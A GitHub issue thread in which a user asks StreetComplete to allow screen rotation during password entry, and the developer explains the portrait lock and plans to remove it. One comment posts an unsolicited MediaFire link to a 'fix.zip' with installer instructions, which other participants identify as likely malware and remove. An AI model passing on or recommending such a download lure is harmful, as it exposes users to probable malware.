### ISSUE TITLE
Allow screen rotating during (possible) password prompting

### ISSUE THREAD

**Issue by Peter0** [streetcomplete/StreetComplete#5838]
**Use case**
Password entering is currently unneccesary difficult

**Proposed Solution**
When the user is prompted to enter a password, e.g. when requesting the OAuth-authorisation (which looks like being delegated by SCEE (SC, too?) to a browser instance), enable screen rotating.
Screen rotating is apparently disabled when executing SCEE (SC, too?) for whatever reason, but consider enabling it during a password prompt.

**Why?**
Some virtual keyboards offer different keyboard layouts depending on whether screen is rotated in landscape or portrait mode. In my case, only in landscape mode I got an ample, more PC-like keyboard layout. Most passwords are memorised not in a direct char by char manner, but rather in shapes the fingers move around or as combination of basic chars and held modifier keys. Thus, to me it is almost impossible to enter a passwort using a virtual keyboard in portrait mode orientation.

Just to be clear: By "enabled screen rotating" I mean the feature that screen content and layout is following the orientation the device is held.

Note: I am not a SC user, but a SCEE one. Hence I first stated this issue there. Ref. https://github.com/Helium314/SCEE/issues/616

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by riQQ** [comment]
Haven't downloaded the file but pretty sure it's malware. Please at least hide the post 

No previous comments: https://github.com/streetcomplete/StreetComplete/issues?q=commenter%3AAlecsSantos

Account created: [July 27, 2023](https://github.com/AlecsSantos?tab=overview&from=2023-07-01&to=2023-07-31)

**Comment by matkoniecz** [comment]
@riQQ It is hidden since I posted my comment. I will delete it now and hide posts about it.

**Comment by westnordost** [comment]
Currently, the whole Profile/Login screen is locked to portrait orientation. This basically had historic reasons because some layouts did not work for landscape mode.
However, as I reimplemented this all in compose, and this time I took care that all layouts well work in any display orientation, the locking to portrait orientation can be removed. This can be done after #5595 is finished.
